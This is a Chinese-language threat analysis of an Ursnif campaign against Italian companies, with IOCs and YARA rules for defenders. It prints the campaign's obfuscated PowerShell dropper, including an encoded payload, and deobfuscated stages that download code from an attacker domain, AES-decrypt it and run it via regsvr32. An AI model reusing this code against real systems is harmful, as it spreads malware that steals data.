Ursnif针对意大利公司的新攻击

2020-05-25 16:07:56 浏览数 (1)

介绍

Ursnif 是十分活跃的威胁之一,通常针对意大利和欧洲多个行业发起垃圾邮件攻击。

最近,发现了一种针对意大利公司的新 Ursnif 变种。垃圾邮件使用 Avviso di Pagamento_xxxx_date 为标题的附件(xxxx 是数字,date 是dd-mm-yyyy格式的日期),比如Avviso di Pagamento_14326_15_04_2020。我们发现本轮攻击中Ursnif/ISFB Dropper使用技术发生了重大的变化,采用了新技术来避免检测,并且对 Ursnif感染链进行了重大的升级改变。

技术分析

与Ursnif恶意软件家族的其他样本相比,本次针对意大利公司使用的样本包含一些重要的升级,而且攻击链有着显著的变化。首先 Dropper 使用 Excel 4.0 宏(XLM 宏)降低反病毒引擎的检出率,随后使用两个不同的 C&C,其中一个 C&C 服务器仅用于记录失陷主机的 UUID 标识。

下图是本次Ursnif攻击行动的完整感染链:

旧宏代码

本次全新的Ursnif攻击行动是使用带有嵌入XML宏的恶意电子邮件附件展开的。以下是Dropper的静态信息:

哈希

5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394

威胁

Ursnif XLS 文档 Dropper

大小

39.0 KB (39936 字节)

文件类型

MS Excel 文档

简要描述

嵌入 XML 宏代码的 Ursnif XLS 文档 Dropper

ssdeep

Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

打开文件,看起来就像是未填写的**。页面上有一个 Visualiz 按钮,诱使受害者点击触发感染。点击该按钮后,将启动旨在感染目标计算机的代码:

该文件在结构上与过去的恶意样本相似,内容差别较大。安全告警显示文档中包含动态内容,经过深入检查后可以发现嵌入 EXCEL 4.0 宏(XML/XLF 宏)的存在。

动态内容是使用 Powershell 编写的,并且被拆分到多个单元格内,然后使用某些预置的处理程序进行评估:

用户点击 Allow Content 可触发 Frame1_Layout 函数。最后会重新组装恶意宏代码,使得文档弹出一个窗口,通知用户文档已经损坏。当用户点击时,宏代码会终止 Excel 进程,但 Powershell 会继续在后台执行。

重新组装宏代码后,提取的宏代码是 Ursnif 的 Dropper:

代码语言:javascript复制
sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3] 'X'-JoIN'') ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( 'ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3 8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q aHOPZ1Xde66 HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES 9ViqrhgrMnYHg**pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT 5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k Da4H/rgd9DsWPGczZ4nI00vnwb cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh lCN 1bpV plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4 C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2C**g6 wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM ml6m efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1 VD1XxHU FCKucbZUkcyUSZBF5ox rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8 axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=' ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )

去混淆后,代码简化如下所示:

代码语言:javascript复制
$lk64bE= [type]("{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}" -F 'RitH','OgrAP','URi','S','Ty.C','As','hY.H','YST','Em.sEc','M','HALgO','Rypt') ; &("{1}{0}"-f 'et','S') 1S7 ( [TyPe]("{3}{1}{2}{0}" -F 'eNCOdING','TeX','t.','SysTEM.') ) ; $9Sk2Z =[TyPE]("{1}{0}" -f 'egEx','r');${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}="MD5"){${Hh}=.('uu') ("{0}{1}{4}{5}{3}{2}" -f'S','ystem.Text.Stri','er','ld','n','gBui'); $lK64BE::("{2}{1}{0}" -f 'e','reat','C').Invoke(${GH})."cOMp`UTEhA`SH"( ( .("{0}{2}{3}{1}"-f'G','E','et-v','ArIaBL') 1S7 ).VAlUE::"uT`F8".("{1}{0}{2}"-f'etByt','G','es').Invoke(${H`Y}))|.('%'){[Void]${h`H}.("{0}{1}"-f'App','end').Invoke(${_}.("{0}{1}" -f'ToSt','ring').Invoke("x2"))};${HH}.("{0}{1}" -f 'ToS','tring').Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&("{1}{0}{2}"-f 'et-Rando','G','m') -Count 3|.('%'){[char]${_}})}while((&('th')(${U})) -notlike '*' ${e`e});return ${U}};${x`D}=("{2}{1}{0}" -f 't','adswif','uplo');${h`z}='ass';${Q}=2;${di}='pw';function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=''};${B`I}= $9SK2Z::("{1}{0}"-f 'eplace','r').Invoke(${t`Ik},'d',${x`D});if(&("{2}{4}{1}{0}{3}" -f 'ecti','onn','T','on','est-C') (${BI} ${D`I}) -Count 1 -quiet){${bi}='' 'ht' 'tp' ("{1}{0}"-f'/','s:/') ${bi} ${dI} '/' ${B`i}.("{1}{2}{0}"-f'ring','Sub','st').Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@(("{0}{1}"-f'new1','.'),'');function k`N{${LP}='2al' (&('ht')(("{0}{1}" -f '*','6e1d'))) ("{1}{0}" -f '.','ail') (.('ht')(("{1}{0}"-f 'b','*95f')));return .('ts')(${Lp})};${X`q}=.('tS')(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&('Kn')};${y}=.('uu') ("{1}{0}{2}" -f'bC','Net.We','lient');${y}."He`AdeRs".("{1}{0}"-f'dd','A').Invoke(("{0}{1}{2}" -f 'Us','er-A','gent'), (("{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}"-f 'ozi','64; x64) AppleW','62','8.102 ','7.','36 (','it/5','0 (','H','Window','Saf','Ge','7','c','183','hrome/70.0.353','M','T','ari','3','ebK',' ','3','.36 Edge/','lla/','ML, ','ko) C','18.','/5','like','K','s NT 10.0; Win','5.')));${y}.("{4}{0}{3}{1}{2}"-f'own','stri','ng','load','D').Invoke(${Xq})|.( ([String]''."ReM`o`Ve")[45,12,27]-Join'')

Dropper 使用 base64 编码、字符串替换(多个 {} 序列)和字符串大写(大小写序列)。执行宏代码后,Dropper 将会连接 newuploadswift [.]pw 域名下载下一阶段的 Payload 并使用 Powershell 执行。

代码语言:javascript复制
'fVcJb9pIFP4rUytb2wpYJD0UBaFdwpFlS6CtIVGXRjvGDODgg9gDCaXz3/d7tgOGRo0UH N3fu9kugpd6UUhs5tT70kYJ9sBHyhzS/d5V9VGsZiJ5/vLS0PbnqttRW3PlFaeMl0sfb2kO67ANdZNqxOuowXxS6lK vcJjnWzGgu5ikOGUz73lapOX9R9e2qlukSqy MdqGpE4VrEMlMGTe8UqXyfqmTlqd6GTBl74Qx38fE9KY6CKyfBg31gAW pguqOB8VvIfKM7IfxOlmeOLrJblcsFE/laPwgXFk92fq8W1e1E NtZsB5akPqsD4Tsgy2jBQPTwEuHmTceeG78/8aUbBcSRHbm0SK4HMcTVauZGU3Pw6dQDCL/WR7yZlYW/iQR5Jzuf0xZJZbz0snnEDMEoBs2HDYaZqwz H/PsK bat3yy9liwefFU6n/GqqanB8omq5/ByxmZsbSaw/HtXPHQywIA0jxYlci52QvAt007S00OFBCwJiBBkRZpq1/aBONKi64Z gqQgmg/ySfu2S1UtHzplhwJI6//FFWUVfGZHKiIKWRTCR 5iZ MvByTAv5Fm5P36ggKfo3OF/LpBvbAuf/lOWtrS9hLv9Hh/UvVDEGlM/rUzM3kI/Y6ZUTcA6Xfl GpCUsgCHHk7IwGvg8dXBQ0BOudEqlOwMsLRXfjfkdX4jtFP9u36aIt9Wp7ql7xO753W7aWZv mlqL/iDqlmGfruCsE7fuhFBFG9sGQsnMEqUrEQIaAMeANoCZUbzVTgTEQPy3TmlWiySBNqs6x/eMpdFqv5RpdERReH5JpoIFJc24a1GH7kTt xEA/I5Cuc7vELKClI8oJxoFeK0r6obfpOXVWUfXypFx4eZQfLI0DmSdfzuHL7ZfKhq ipB5FlWIdXii2ULdxV7cmM14s1SRrPYWc43hyQD8Syry9XY91zm k6SsPp0m78n0pG4jTdSjO5ZEPlG/rhYlPCREo75D Y2P33wFqxGhc Gg/ZFK3SjCSgM00Lgr0CSGCCu1gVUtOxOsPRFIEJSgfDWGM5hpnCkMDR810B5TGV9EhtQQs8r3ygK NjwlkhkerFajatqJ/N8gDpMplEcsOP32q/G5GY0hZvSxvvwHDFbu6e2Fzr lR 5**OwqZQAkdUV4UzOzap6FU4X2ZdjeARnrozwzlu31c46MrqzndJBi1ki4mPhuZgpUHw9Vrnw16OUCyfNxAb63yn4rfW/VUC 7xUovWrt8h3doo5sn0zKg81SUKOge1NMvdBLM Vkm6wKAy9KPHSDG rez/yLQvN4ROf4k7pIl6YOROv2GnIuwBlQZen2LV5lpcteaYseNbOQulpP0NW6E MGKi8VQx3/1ok9Z yLyyu2ax7GUbl2aKCKoEj9HfrQ6ta83h0KzdxZ1WTFBYBmizNpUo UdGlGT6Ef6WY6jJo2 pgxysJ6T8qvScIVK986/kqg3dBZ1y6qbULnrcO7w5aGp06P3/YXQksJrztFwgsyrt7lZJy5y/e3hbAwvUcTqdvVTfTENp8kyizEYSH8NQLRzmdlNiTYyxyLkswJfB3Vp9kmslsbCPKpLG4akFKircGvK twQdJX4zTXaLxmY eFq1I6 2iSkiHlQrupDtpvNiZfRuQKl/EhL3EK3k55 Y45b9yYLeujhSxn6fM sRAnKydL35P6Gx3n6xieUm 1XgqAJsRQ8vaFVkXHEI47h6N9xTxK6aivRpV7mmsRHw5U7S8jE05bExzalUc TwdRY 7E9TimuYD/TXGUQMYvMXhqgepbGjmaijAAT9gNK1Uo92C6Lxl9sjSXR8NwoNF5R52e5iZJxU5rbORC670xomZ T QjYr5n5fFzFO9O63TcUX8QI KnNfpD3hto96aipcq2X/CyNOxBCDF3KSOJOgXhVHujmYj mn8FyazFB/Yg5h7vXWtkPcFjFuYl5BWycDZOV4NOEQBaTNdwf4FuUh15kTX1fLFbhncb4x0GpUgLl6Zt3fevNsWUDLChlQzrENYU1acU1gWhWFjszisVrHZUS97UONrsXC9NX1ofg4VC5WFS8Gv5t5bG4cPZubkVz54srgEwMCC7HqkjJsT4SRW6JjWOxCfzxRIUZx owST Lw7v1jdiwF5HIn2/SxsguV8/9HgBjw9wTH/LZD8LjHyrh4dpU51hv/4f'),

去混淆后,Powershell 变成如下所示:

代码语言:javascript复制
function SDfiwe(${T`T}){${T`hL}=[regex]::("{2}{0}{1}"-f 'epl','ace','r').Invoke(${tt},'d','');return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::("{0}{3}{2}{4}{1}" -f'F','tring','e64','romBas','S').Invoke(${t`E});return ${Ii}};&("{1}{0}"-f'l','sa') Vu new-object;${l`LA}=$(&("{0}{2}{3}{1}"-f'get-','object','wm','i') Win32_ComputerSystemProduct -computername . | &("{0}{2}{1}"-f'Select-','ject','Ob') -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&("{0}{1}" -f'gc','i') ${a`zq}|&("{1}{0}{2}"-f 'd','get-ran','om'))."na`mE" -replace ".{5}$";${M`K}=(&("{1}{0}"-f 'i','Gc') -path (((${A`zQ}.("{0}{2}{1}" -f 'to','ring','st').Invoke()))) | &("{2}{3}{0}{1}"-f 'e-Obj','ect','W','her') { ${_}."pSis`cON`TAiner" }|.("{2}{1}{0}"-f 'lect','e','s') fullname |.("{1}{0}{2}"-f'ndo','Get-Ra','m') -count 1)."FulLn`A`Me" '' ${f`BF} '.';function NiLL(${T`yO}){${k`j}=.('Vu') IO.MemoryStream(,${t`yO});${m`m}=(.('Vu') IO.StreamReader(&('Vu') IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::"d`ECO`mPrESs"))).("{1}{2}{0}"-f 'nd','ReadT','oE').Invoke();return ${M`M}};&("{0}{1}" -f 's','al') msq regsv***;${S`U}='using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create("AES");AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}';.("{0}{1}"-f'A','dd-Type') -TypeDefinition ${su};function osi{${M}=${x`Q} ${q} '?' ${L`LA};.('Sv') 8 ${m};&('SV') t0L ("{2}{3}{0}{1}"-f 'ie','nt','Net','.WebCl');.('Si') Variable:B (&('Vu') (&("{0}{1}" -f 'I','tem') Variable:t0L)."v`ALUe");.('Sv') D ("{2}{0}{1}" -f'adDa','ta','Downlo');${f`DS}=(([byte[]](&('Gv') B -Value).((&('LS') Variable:D)."Va`LUE")."IN`VOke"((&('GI') Variable:8)."vAL`Ue")));return &("{0}{1}"-f 'Ni','LL')(${F`ds})};function kelv{${Fd}=&("{1}{0}" -f 'i','os');${fd}=[Af]::("{1}{0}"-f'e','ft').Invoke(${Fd},${l`lA}.("{2}{0}{1}"-f'ubstrin','g','s').Invoke(0,16));${U}=${FD}.("{1}{2}{0}" -f 'tring','su','bs').Invoke(0,1);${e`F}=${F`D}.("{1}{0}"-f 'emove','r').Invoke(0,1);${O`O}=${e`F} -split'!';${vr}=[Text.Encoding]::"Ut`F8";foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.("{0}{1}{2}"-f'ToCharArr','a','y').Invoke();${o}=&("{1}{0}" -f 'wE','Y')(${O});for(${I}=0; ${i} -lt ${O}."c`oUnT"; ${I}  ){${o`Ut}  = [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}."COU`NT"])}};${SS}=${e`F}."rep`lA`ce"((${o`O}[0] "!"),${v`R}."gE`TSTr`i`NG"(${O`UT}));return ${SS}};function gb{${k`I}=&("{1}{0}"-f'lv','ke');[io.file]::("{0}{2}{1}"-f'Write','tes','AllBy').Invoke(${m`K},(.("{1}{0}" -f 'E','Yw')(${ki} -replace ".{200}$")));if((&("{1}{0}"-f 'ci','g') ${mk})."Len`GtH" -lt 512){exit};&("{0}{1}"-f'ms','q') -s ${mK};.("{0}{1}" -f'sle','ep') 15;.('sl');[io.file]::("{2}{1}{0}" -f'ines','llL','WriteA').Invoke(${m`k},(&("{1}{0}"-f'Dfiwe','S')(${l`LA})))};&('gb')

在此处,恶意软件使用了一个特殊的技巧保证唯一感染。在前面的代码段中,已经看见了该计算机的 UUID 创建,该 UUID 值被作为 GET 请求的参数。如果第二次使用相同的 UUID 发送 GET 请求,服务器将返回一个空响应。而如果 UUID 被第一次发送给服务器,将返回感染的下一阶段。

如上所示,响应体已经被加密了。由上面代码中显示的 AES 解密代码解密,随后通过 regsrv32.exe 进程执行。

Loader

Payload 如下所示:

哈希

e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0

威胁

Ursnif Loader

大小

289.50KB(296448 字节)

文件类型

DLL

简要描述

能够注入内存的 Ursnif Loader

ssdeep

6144:ydLG0cc HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu a:y5GjsEzaKG4XcLs3isu a

imphash

f11ff0b8c499af0d98f00299b97339cf

该组件是 Ursnif 的 Payload 的加载程序,写入注册表 HKCUSoftwareAppDataLowSoftwareMicrosoftMicrosoft[RANDOMID] 作为持久化机制。

和经典的 Ursnif 恶意软件感染类似,该样本也会将配置字符串以 base64 编码并使用 Serpent 算法加密发送到 C&C 服务器。两种方法可以检索配置字符串:

第一种是使用进程内存中的密钥解密发送到 C&C 服务器的请求 第二种是在进程中查找配置字符串

Ursnif 本次攻击行动的配置如下所示:

代码语言:javascript复制
k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*

结论

通过持续的跟踪分析,可以发现 Ursnif 的 TTP 在随着时间改变,恶意软件在规避检测与反分析上的技术正在迅速发展。

本次针对意大利公司的攻击在保持基本特征和功能不变的前提下,使用 XLM 宏来降低反病毒引擎的检出率,并使用两个不同的 C&C 服务器。其中一个 C&C 服务器只接受 UUID 跟踪失陷主机,该机制可以更好地跟踪恶意软件的感染情况。

IOC

5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394E32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0newuploadswift[.pwyefgweoiuhf[.xyzHKCUSoftwareAppDataLowSoftwareMicrosoftMicrosoft[RANDOMID]

Yara

代码语言:javascript复制
rule loaderXLS_Ursnif_Italy_April_2020 {
meta:
      description = "Yara rule for Ursnif XLS loader - April Italian Campaign"
      hash = "5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-04-16"
      tlp = "white"
      category = "informational"
strings:
    $s1 = "powershellB"
    $s2 = {73 61 70 73 20 50 6F 77 65 72 53 68 65 6C 6C 20 2D 61 72 67 20 27 73 61 6C 20 75 75 20 4E 65 77 2D 4F 62 6A 65 63 74 3B 20 26 7B 28 7D 20 7B 28 7D 7B 5B 7D 73 74 52 49 4E 47 7B 5D 7D 24 56 45 72 42 6F 53 65 50 52 65 66 45 72 45 4E 63 65 7B 29 7D 7B 5B 7D 31 2C 33 7B 5D 7D 7B 2B 7D 27 27 58 27 27 2D 4A 6F 49 4E 27 27 27 27 7B 29 7D 20 7B 28 7D 20 75 75 20 69 6F 2E 63 6F 6D 70 52 45 53 53 69 4F 4E 2E 64 65 66 4C 61 54 45 73 74 72 45 61 4D 7B 28 7D 7B 5B 7D 73 79 73 74 65 6D 2E 49 6F 2E 6D 65 4D 6F 52 79 73 54 72 45 61 4D 7B 5D 7D 20 7B 5B 7D 63 6F 6E 56 65 72 54 7B 5D 7D 3A 3A 46 52 4F 4D 62 41 53 45 36 34 53 74 72 69 4E 47 7B 28 7D 20 27 27 5A 56 55 4C 55 39 70 4B 46 50 34 72 4F 78 6D 75 6D 36 30 51 53 58 68 70 47 57 59 75 61 6C 6F 6F 50 6C 72 42 31 74 62}
    $s3 = {FF 09 01 17 FC 00 4C 33 45 52 5A 4A 53 55 6D 53 4A 59 71 54 66 65 2F 33 7B 2B 7D 38 73 79 47 50 75 44 4E 6B 58 35 2F 47 64 4E 32 4F 46 65 46 4B 76 33 76 6B 74 78 6D 37 56 59 69 71 48 74 70 56 58 64 4E 37 51 7B 2B 7D 61 48 4F 50 5A 31 58 64 65 36 36 7B 2B 7D 48 52 65 31 33 6B 4E 68 37 4C 4F 38 54 76 53 46 69 74 39 59 50 77 71 55 68 31 65 35 4A 65 50 73 2F 5A 6E 37 4E 64 58 45 64 59 7B 2B 7D 76 73 48 43 4F 63 48 57 7A 72 43 4D 76 7A 74 45 39 4C 30 2F 77 4F 6F 2F 4F 5A 6C 2F 6A 38 4D 35 76 6B 37 37 37 50 45 53 7B 2B 7D 39 56 69 71 72 68 67 72 4D 6E 59 48 67 43 34 70 4D 4D 71 50 54 41 75 6C 5A 45 6E 6D 4E 74 76 4D 42 73 59 42 34 76 50 62 78 68 64 41 37 43 38 51 69 49 76 54 69 35 48 33 59 75 50 70 46 76 65 59 46 55 4F 73 53 36 79 67 58 2F 75 51 49 43 41 38 4D 4A}
    $s4 = {2B 7D 4C 39 59 43 32 53 34 67 2F 58 69 70 6A 52 39 4F 69 2F 67 6D 48 47 52 62 4F 51 64 33 74 42 65 68 5A 63 39 6E 57 72 33 50 77 77 54 7B 2B 7D 35 56 6C 43 5A 73 45 49 7A 74 32 37 36 61 52 63 6E 6A 6B 42 58 79 7A 6B 49 58 43 2F 6E 48 59 4B 78 62 31 76 6C 70 7A 52 49 35 33 6E 42 78 62 44 36 66 51 79 48 45 6C 77 33 49 71 6E 46 63 68 64 43 53 4B 75 4F 65 52 61 62 6B 6B 7A 4F 51 72 38 6F 68 69 58 69 52 4D 79 7A 78 43 45 75 43 37 2F 46 34 48 67 45 4A 51 33 68 36 39 65 71 78 2F 2F 34 39 78 48 6C 36 42 7A 43 68 6C 53 45 35 36 49 51 4C 70 35 76 38 53 69 66 53 42 71 4B 4F 46 6F 35 31 66 33 6B 7B 2B 7D 44 61 34 48 2F 72 67 64 39 44 73 57 50 47 63 7A 5A 34 6E 49 30 30 76 6E 77 62 7B 2B 7D 63 76 4F 57 54 63 6C 58 36 52 64 47 61 64 63 50 6A 4D 77 6F 45 75 5A 73 4A }
    $s5 = {54 2E 45 6E 43 4F 44 69 6E 67 7B 5D 7D 3A 3A 41 73 43 49 69 20 7B 29 7D 20 7B 7D 7D 20 7C 46 6F 52 65 41 43 68 2D 4F 42 6A 65 63 54 7B 7B 7D 24 5F 2E 52 45 41 44 54 4F 45 6E 44 7B 28 7D 7B 29 7D 20 7B 7D 7D 20 7B 29 7D 27 20 2D 57 69 6E 20 30 31 3B 63 6C 65 61 72 3B 65 78 69 74 7E 7B 4E 55 4D 4C 4F 43 4B 7D
}
    $s6 = {20 69 6D 70 6F 73 73 69 62 69 6C 65 20 63 61 72 69 63 61 72 6C 6F 2E
}
condition:
    $s1 and (1 of ($s2,$s3,$s4,$s5)) and $s6
}
import "pe"
rule payload_DLL_Ursnif_March_2020 {
meta:
      description = "Yara rule for Ursnif payload - April Italian Campaign"
      hash = "E32C592819D825851BAE84A33BF5FA1A26E0A57A14C0E4B8C3E845C1117998A0"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-04-17"
      tlp = "white"
      category = "informational"
strings:
    $b1 = "c:\Above\Industry\Fear\ring\charge\large\set\EarthAgainst.pdb" ascii wide
    $b2 = {00 2E 3F 41 56 72 75 6E 74 69 6D 65 5F 65 72 72 6F 72 40 73 74 64 40 40}
    $b3 = {41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A}
    $b4 = {65 00 6E 00 2D 00 ?? 00 ?? 00 00 00}
    $b5 = "A-C0F2E0B9FA8E}\hide.me VPN\Hide.me.exe" ascii wide
Condition:
    uint16(0) == 0x5A4D and pe.number_of_sections == 5 and  pe.imphash()=="f11ff0b8c499af0d98f00299b97339cf" and any of them
}

*参考来源:Yoroi,FB 小编 Avenger 编译,转载请注明来自 FreeBuf.COM

0 人点赞